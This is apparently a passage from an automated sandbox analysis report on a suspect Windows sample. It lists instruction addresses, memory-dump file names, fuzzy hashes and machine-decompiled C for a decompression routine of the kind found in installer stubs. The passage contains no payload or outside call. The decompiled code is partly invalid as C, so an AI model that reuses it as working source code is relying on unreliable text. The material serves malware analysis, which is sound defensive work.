                                                  0x004064e9
                                                  0x004064ec
                                                  0x004064f9
                                                  0x004064fc
                                                  0x004064fc
                                                  0x00406840
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00000000
                                                  0x00406520
                                                  0x00406524
                                                  0x00000000
                                                  0x00000000
                                                  0x0040652a
                                                  0x0040652e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406534
                                                  0x00406536
                                                  0x0040653a
                                                  0x0040653a
                                                  0x0040653d
                                                  0x00406541
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065c3
                                                  0x004065c6
                                                  0x004065c9
                                                  0x004065be
                                                  0x004065be
                                                  0x004065be
                                                  0x004065cc
                                                  0x004065cf
                                                  0x00000000
                                                  0x00000000
                                                  0x00406678
                                                  0x00406678
                                                  0x0040667c
                                                  0x00406a1a
                                                  0x00000000
                                                  0x00406a1a
                                                  0x00406682
                                                  0x00406685
                                                  0x00406688
                                                  0x0040668c
                                                  0x0040668f
                                                  0x00406695
                                                  0x00406697
                                                  0x00406697
                                                  0x00406697
                                                  0x0040669a
                                                  0x0040669d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040626d
                                                  0x0040626d
                                                  0x00406271
                                                  0x004069de
                                                  0x00000000
                                                  0x004069de
                                                  0x00406277
                                                  0x0040627a
                                                  0x0040627d
                                                  0x00406281
                                                  0x00406284
                                                  0x0040628a
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628f
                                                  0x00406292
                                                  0x00406292
                                                  0x00406295
                                                  0x00406298
                                                  0x00000000
                                                  0x00000000
                                                  0x0040629e
                                                  0x004062a4
                                                  0x00000000
                                                  0x00000000
                                                  0x004062aa
                                                  0x004062aa
                                                  0x004062ae
                                                  0x004062b1
                                                  0x004062b4
                                                  0x004062b7
                                                  0x004062ba
                                                  0x004062bb
                                                  0x004062be
                                                  0x004062c0
                                                  0x004062c6
                                                  0x004062c9
                                                  0x004062cc
                                                  0x004062cf
                                                  0x004062d2
                                                  0x004062d5
                                                  0x004062d8
                                                  0x004062f4
                                                  0x004062f7
                                                  0x004062fa
                                                  0x004062fd
                                                  0x00406304
                                                  0x00406308
                                                  0x0040630a
                                                  0x0040630e
                                                  0x004062da
                                                  0x004062da
                                                  0x004062de
                                                  0x004062e6
                                                  0x004062eb
                                                  0x004062ed
                                                  0x004062ef
                                                  0x004062ef
                                                  0x00406311
                                                  0x00406318
                                                  0x0040631b
                                                  0x00000000
                                                  0x00406321
                                                  0x00000000
                                                  0x00406321
                                                  0x00000000
                                                  0x00406326
                                                  0x00406326
                                                  0x0040632a
                                                  0x004069ea
                                                  0x00000000
                                                  0x004069ea
                                                  0x00406330
                                                  0x00406333
                                                  0x00406336
                                                  0x0040633a
                                                  0x0040633d
                                                  0x00406343
                                                  0x00406345
                                                  0x00406345
                                                  0x00406345
                                                  0x00406348
                                                  0x0040634b
                                                  0x0040634b
                                                  0x0040634b
                                                  0x00406351
                                                  0x00000000
                                                  0x00000000
                                                  0x00406353
                                                  0x00406356
                                                  0x00406359
                                                  0x0040635c
                                                  0x0040635f
                                                  0x00406362
                                                  0x00406365
                                                  0x00406368
                                                  0x0040636b
                                                  0x0040636e
                                                  0x00406371
                                                  0x00406389
                                                  0x0040638c
                                                  0x0040638f
                                                  0x00406392
                                                  0x00406392
                                                  0x00406395
                                                  0x00406399
                                                  0x0040639b
                                                  0x00406373
                                                  0x00406373
                                                  0x0040637b
                                                  0x00406380
                                                  0x00406382
                                                  0x00406384
                                                  0x00406384
                                                  0x0040639e
                                                  0x004063a5
                                                  0x004063a8
                                                  0x00000000
                                                  0x004063aa
                                                  0x00000000
                                                  0x004063aa
                                                  0x004063a8
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x00000000
                                                  0x00000000
                                                  0x004063ea
                                                  0x004063ea
                                                  0x004063ee
                                                  0x004069f6
                                                  0x00000000
                                                  0x004069f6
                                                  0x004063f4
                                                  0x004063f7
                                                  0x004063fa
                                                  0x004063fe
                                                  0x00406401
                                                  0x00406407
                                                  0x00406409
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640c
                                                  0x0040640f
                                                  0x0040640f
                                                  0x00406415
                                                  0x004063b3
                                                  0x004063b3
                                                  0x004063b6
                                                  0x00000000
                                                  0x004063b6
                                                  0x00406417
                                                  0x00406417
                                                  0x0040641a
                                                  0x0040641d
                                                  0x00406420
                                                  0x00406423
                                                  0x00406426
                                                  0x00406429
                                                  0x0040642c
                                                  0x0040642f
                                                  0x00406432
                                                  0x00406435
                                                  0x0040644d
                                                  0x00406450
                                                  0x00406453
                                                  0x00406456
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645d
                                                  0x0040645f
                                                  0x00406437
                                                  0x00406437
                                                  0x0040643f
                                                  0x00406444
                                                  0x00406446
                                                  0x00406448
                                                  0x00406448
                                                  0x00406462
                                                  0x00406469
                                                  0x0040646c
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x004066fb
                                                  0x004066fb
                                                  0x004066ff
                                                  0x00406a26
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406705
                                                  0x00406708
                                                  0x0040670b
                                                  0x0040670f
                                                  0x00406712
                                                  0x00406718
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040680a
                                                  0x0040680e
                                                  0x00406830
                                                  0x00406833
                                                  0x0040683d
                                                  0x00406840
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00406840
                                                  0x00406810
                                                  0x00406813
                                                  0x00406817
                                                  0x0040681a
                                                  0x0040681a
                                                  0x0040681d
                                                  0x00000000
                                                  0x00000000
                                                  0x004068c7
                                                  0x004068cb
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068f0
                                                  0x004068f7
                                                  0x004068fe
                                                  0x004068fe
                                                  0x00000000
                                                  0x004068fe
                                                  0x004068cd
                                                  0x004068d0
                                                  0x004068d3
                                                  0x004068d6
                                                  0x004068dd
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x00000000
                                                  0x00000000
                                                  0x004069b8
                                                  0x004069bb
                                                  0x004068bc
                                                  0x00000000
                                                  0x00000000
                                                  0x004065f2
                                                  0x004065f4
                                                  0x004065fb
                                                  0x004065fc
                                                  0x004065fe
                                                  0x00406601
                                                  0x00000000
                                                  0x00000000
                                                  0x00406609
                                                  0x0040660c
                                                  0x0040660f
                                                  0x00406611
                                                  0x00406613
                                                  0x00406613
                                                  0x00406614
                                                  0x00406617
                                                  0x0040661e
                                                  0x00406621
                                                  0x0040662f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406905
                                                  0x00406905
                                                  0x00406908
                                                  0x0040690f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406914
                                                  0x00406914
                                                  0x00406918
                                                  0x00406a50
                                                  0x00000000
                                                  0x00406a50
                                                  0x0040691e
                                                  0x00406921
                                                  0x00406924
                                                  0x00406928
                                                  0x0040692b
                                                  0x00406931
                                                  0x00406933
                                                  0x00406933
                                                  0x00406933
                                                  0x00406936
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x0040693c
                                                  0x0040693c
                                                  0x00406940
                                                  0x004069a0
                                                  0x004069a3
                                                  0x004069a8
                                                  0x004069a9
                                                  0x004069ab
                                                  0x004069ad
                                                  0x004069b0
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00000000
                                                  0x004068c2
                                                  0x004068bc
                                                  0x00406942
                                                  0x00406948
                                                  0x0040694b
                                                  0x0040694e
                                                  0x00406951
                                                  0x00406954
                                                  0x00406957
                                                  0x0040695a
                                                  0x0040695d
                                                  0x00406960
                                                  0x00406963
                                                  0x0040697c
                                                  0x0040697f
                                                  0x00406982
                                                  0x00406985
                                                  0x00406989
                                                  0x0040698b
                                                  0x0040698b
                                                  0x0040698c
                                                  0x0040698f
                                                  0x00406965
                                                  0x00406965
                                                  0x0040696d
                                                  0x00406972
                                                  0x00406974
                                                  0x00406977
                                                  0x00406977
                                                  0x00406992
                                                  0x00406999
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x00406637
                                                  0x0040663a
                                                  0x00406670
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a3
                                                  0x004067a3
                                                  0x004067a6
                                                  0x004067a8
                                                  0x00406a32
                                                  0x00000000
                                                  0x00406a32
                                                  0x004067ae
                                                  0x004067b1
                                                  0x00000000
                                                  0x00000000
                                                  0x004067b7
                                                  0x004067bb
                                                  0x004067be
                                                  0x004067be
                                                  0x004067be
                                                  0x00000000
                                                  0x004067be
                                                  0x0040663c
                                                  0x0040663e
                                                  0x00406640
                                                  0x00406642
                                                  0x00406645
                                                  0x00406646
                                                  0x00406648
                                                  0x0040664a
                                                  0x0040664d
                                                  0x00406650
                                                  0x00406666
                                                  0x0040666b
                                                  0x004066a3
                                                  0x004066a3
                                                  0x004066a7
                                                  0x004066d3
                                                  0x004066d5
                                                  0x004066dc
                                                  0x004066df
                                                  0x004066e2
                                                  0x004066e2
                                                  0x004066e7
                                                  0x004066e7
                                                  0x004066e9
                                                  0x004066ec
                                                  0x004066f3
                                                  0x004066f6
                                                  0x00406723
                                                  0x00406723
                                                  0x00406726
                                                  0x00406729
                                                  0x0040679d
                                                  0x0040679d
                                                  0x0040679d
                                                  0x00000000
                                                  0x0040679d
                                                  0x0040672b
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406740
                                                  0x00406743
                                                  0x00406746
                                                  0x00406749
                                                  0x0040674c
                                                  0x00406765
                                                  0x00406767
                                                  0x0040676a
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406773
                                                  0x00406775
                                                  0x00406777
                                                  0x0040677a
                                                  0x0040677c
                                                  0x0040677f
                                                  0x00406783
                                                  0x00406785
                                                  0x00406785
                                                  0x00406786
                                                  0x00406789
                                                  0x0040678c
                                                  0x0040674e
                                                  0x0040674e
                                                  0x00406756
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00406760
                                                  0x0040678f
                                                  0x00406796
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00000000
                                                  0x00406798
                                                  0x00000000
                                                  0x00406798
                                                  0x00406796
                                                  0x004066a9
                                                  0x004066ac
                                                  0x004066ae
                                                  0x004066b1
                                                  0x004066b4
                                                  0x004066b7
                                                  0x004066b9
                                                  0x004066bc
                                                  0x004066bf
                                                  0x004066bf
                                                  0x004066c2
                                                  0x004066c2
                                                  0x004066c5
                                                  0x004066cc
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x00000000
                                                  0x004066ce
                                                  0x00000000
                                                  0x004066ce
                                                  0x004066cc
                                                  0x00406652
                                                  0x00406655
                                                  0x00406657
                                                  0x0040665a
                                                  0x00000000
                                                  0x00000000
                                                  0x004063b9
                                                  0x004063b9
                                                  0x004063bd
                                                  0x00406a02
                                                  0x00000000
                                                  0x00406a02
                                                  0x004063c3
                                                  0x004063c6
                                                  0x004063c9
                                                  0x004063cc
                                                  0x004063cf
                                                  0x004063d2
                                                  0x004063d5
                                                  0x004063d7
                                                  0x004063da
                                                  0x004063dd
                                                  0x004063e0
                                                  0x004063e2
                                                  0x004063e2
                                                  0x004063e2
                                                  0x00000000
                                                  0x00000000
                                                  0x00406544
                                                  0x00406544
                                                  0x00406548
                                                  0x00406a0e
                                                  0x00000000
                                                  0x00406a0e
                                                  0x0040654e
                                                  0x00406551
                                                  0x00406554
                                                  0x00406557
                                                  0x00406559
                                                  0x00406559
                                                  0x00406559
                                                  0x0040655c
                                                  0x0040655f
                                                  0x00406562
                                                  0x00406565
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656c
                                                  0x0040656e
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406571
                                                  0x00406574
                                                  0x00406577
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657d
                                                  0x0040657f
                                                  0x0040657f
                                                  0x00000000
                                                  0x00000000
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c5
                                                  0x00000000
                                                  0x00000000
                                                  0x004067cb
                                                  0x004067ce
                                                  0x004067d1
                                                  0x004067d4
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d9
                                                  0x004067dc
                                                  0x004067df
                                                  0x004067e2
                                                  0x004067e5
                                                  0x004067e8
                                                  0x004067e9
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f1
                                                  0x004067f4
                                                  0x004067f7
                                                  0x004067fa
                                                  0x004067fe
                                                  0x00406800
                                                  0x00406803
                                                  0x00000000
                                                  0x00406805
                                                  0x00406582
                                                  0x00406582
                                                  0x00000000
                                                  0x00406582
                                                  0x00406803
                                                  0x00406a38
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067
                                                  0x00406a6f
                                                  0x00406a6f
                                                  0x00000000
                                                  0x00406a6f
                                                  0x004068bc
                                                  0x00406843
                                                  0x00406840
                                                  0x00000000
                                                  0x00406595

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                                  • Instruction ID: c4674237f5282a099a09cde02a4657600336f9fef0cdfe8d994bfdecfa790225
                                                  • Opcode Fuzzy Hash: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                                  • Instruction Fuzzy Hash: 4A714671E00228CFDF28DFA8C8547ADBBB1FB44301F15816AD916BB281C7785A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004064DD, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E004064DD() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
